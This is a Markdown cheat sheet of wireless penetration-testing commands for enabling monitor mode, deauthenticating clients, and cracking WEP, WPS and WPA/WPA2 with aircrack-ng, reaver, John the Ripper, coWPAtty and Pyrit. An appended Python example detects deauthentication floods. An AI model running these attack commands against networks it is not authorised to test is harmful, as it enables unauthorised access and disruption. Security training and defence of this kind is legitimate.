wireless_penetration_testing.md

File metadata and controls

43 lines (33 loc) · 4.76 KB

# Wireless Penetration Testing Cheat Sheet

## Wireless Antenna

| Action | Command |
| --- | --- |
| Kill Monitor Processes | `airmon-ng check kill` |
| Open Monitor Mode | `ifconfig wlan0 down`<br>`airmon-ng start wlan0`<br>or<br>`iwconfig wlan0 mode monitor`<br>`ifconfig wlan0 up` |
| Increase Wi-Fi TX Power | `iw reg set BO`<br>`iwconfig wlan0 txpower <NmW>` |
| Change Wi-Fi Channel | `iwconfig wlan0 channel <SetChannel(1-14)>` |

## Find Hidden SSID

| Action | Command |
| --- | --- |
| Start Monitor Mode | `airmon-ng start wlan0` |
| Find Hidden SSID | `airodump-ng -c <Channel> --bssid <BSSID> mon0`<br>`aireplay-ng -0 20 -a <BSSID> -c <VictimMac> mon0` |

## WEP Cracking (via Client)

| Method | Command |
| --- | --- |
| ARP Request Replay Attack | `airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0`<br>`macchanger --show mon0`<br>`aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> mon0`<br>`aircrack-ng -b <BSSID> <PCAP_of_FileName>` |
| Interactive Packet Replay Attack | `airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0`<br>`macchanger --show mon0`<br>`aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> mon0`<br>`aircrack-ng -b <BSSID> <PCAP_of_FileName>` |
| SKA (Shared Key Authentication) Cracking | `airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0`<br>`aireplay-ng -0 10 -a <BSSID> -c <VictimMac> mon0`<br>`aircrack-ng <PCAP_of_FileName>` |

## WEP Cracking (Clientless)

| Method | Command |
| --- | --- |
| Chop Chop Attack | `airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0`<br>`macchanger --show mon0`<br>`aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> mon0`<br>`packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>`<br>`aircrack-ng <PCAP_of_FileName>` |
| Fragmentation Attack | `airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0`<br>`macchanger --show mon0`<br>`aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> mon0`<br>`packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>`<br>`aircrack-ng <PCAP_of_FileName>` |

## WPA / WPA2 Cracking

| Method | Command |
| --- | --- |
| WPS Attack | `airmon-ng start wlan0`<br>`apt-get install reaver`<br>`wash -i mon0`<br>`reaver -i mon0 -b <BSSID> -vv -S`<br>or<br>`reaver -i mon0 -c <Channel> -b <BSSID> -p <PinCode> -vv -S` |
| Dictionary Attack | `airmon-ng start wlan0`<br>`airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0`<br>`aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0`<br>`aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP>` |
| Crack with John The Ripper | `airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0`<br>`aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0`<br>`cd /pentest/passwords/john`<br>`./john --wordlist=<Wordlist> --rules --stdout` |
| Crack with coWPAtty | `airmon-ng start wlan0`<br>`airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0`<br>`aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0`<br>`cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID>` |
| Crack with Pyrit | `airmon-ng start wlan0`<br>`airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> mon0`<br>`aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0`<br>`pyrit -r <PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough` |
| Precomputed WPA Keys Database Attack | `airmon-ng start wlan0`<br>`airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> mon0`<br>`aireplay-ng -0 1 -a <BSSID> -c <VictimMac> mon0`<br>`kwrite ESSID.txt`<br>`airolib-ng NEW_DB --import essid ESSID.txt`<br>`airolib-ng NEW_DB --import passwd <DictionaryFile>` |
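Added example from the defender's side (not part of the cheat sheet): nearly every row above depends on `aireplay-ng -0` deauthentication bursts, and the detector below parses raw 802.11 management frames from a monitor-mode capture and flags any BSSID that receives more than a threshold of deauth/disassoc frames inside a one-second window. The radiotap handling, the MAC addresses and the timestamps are assumptions constructed for the demo.

```python
# Added example, not from the cheat sheet: detect the deauthentication floods that
# `aireplay-ng -0` generates by parsing raw 802.11 management frames (IEEE 802.11 layout).
from collections import defaultdict, deque
import struct

DEAUTH, DISASSOC = 0xC, 0xA          # management-frame subtypes
BROADCAST = bytes.fromhex("ffffffffffff")
AP = bytes.fromhex("020000000001")   # constructed, locally administered BSSID
STA = bytes.fromhex("020000000002")  # constructed client address

def strip_radiotap(frame: bytes) -> bytes:
    """Drop the radiotap pseudo-header of monitor-mode captures (its length sits at bytes 2-3, LE)."""
    return frame[struct.unpack_from("<H", frame, 2)[0]:]

def parse_mgmt(frame: bytes, radiotap: bool = True):
    """Return (subtype, src, bssid, reason) for an 802.11 management frame, else None."""
    f = strip_radiotap(frame) if radiotap else frame
    if len(f) < 24:
        return None
    ftype, subtype = (f[0] >> 2) & 0x3, (f[0] >> 4) & 0xF   # frame control byte 0
    if ftype != 0:                                          # 0 = management
        return None
    # reason code follows the 24-byte header on deauth/disassoc frames
    reason = struct.unpack_from("<H", f, 24)[0] if subtype in (DEAUTH, DISASSOC) and len(f) >= 26 else None
    return subtype, f[10:16].hex(":"), f[16:22].hex(":"), reason

def detect_deauth_flood(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_s, raw_bytes). Returns {bssid: peak_count} for every BSSID
    that saw more than `threshold` deauth/disassoc frames inside a `window`-second span."""
    recent, alerts = defaultdict(deque), {}
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        q = recent[parsed[2]]
        q.append(ts)
        while ts - q[0] > window:                           # slide the window forward
            q.popleft()
        if len(q) > threshold:
            alerts[parsed[2]] = max(alerts.get(parsed[2], 0), len(q))
    return alerts

def sample_deauth(dst, src, bssid, reason=7):
    """Constructed sample frame: 8-byte radiotap header + deauth header + reason code."""
    rt = b"\x00\x00" + struct.pack("<H", 8) + b"\x00" * 4
    return rt + b"\xc0\x00\x3a\x01" + dst + src + bssid + b"\x00\x00" + struct.pack("<H", reason)

def demo_frames():
    """Constructed capture: a lone deauth from another BSSID, then a 15-frame burst at AP."""
    other = bytes.fromhex("020000000009")
    return [(0.0, sample_deauth(STA, other, other))] + \
           [(5 + i * 0.05, sample_deauth(BROADCAST, AP, AP)) for i in range(15)]
```

Feed it `(timestamp, bytes)` pairs from any pcap reader; the lone deauth stays below the threshold while the burst is reported with its peak count.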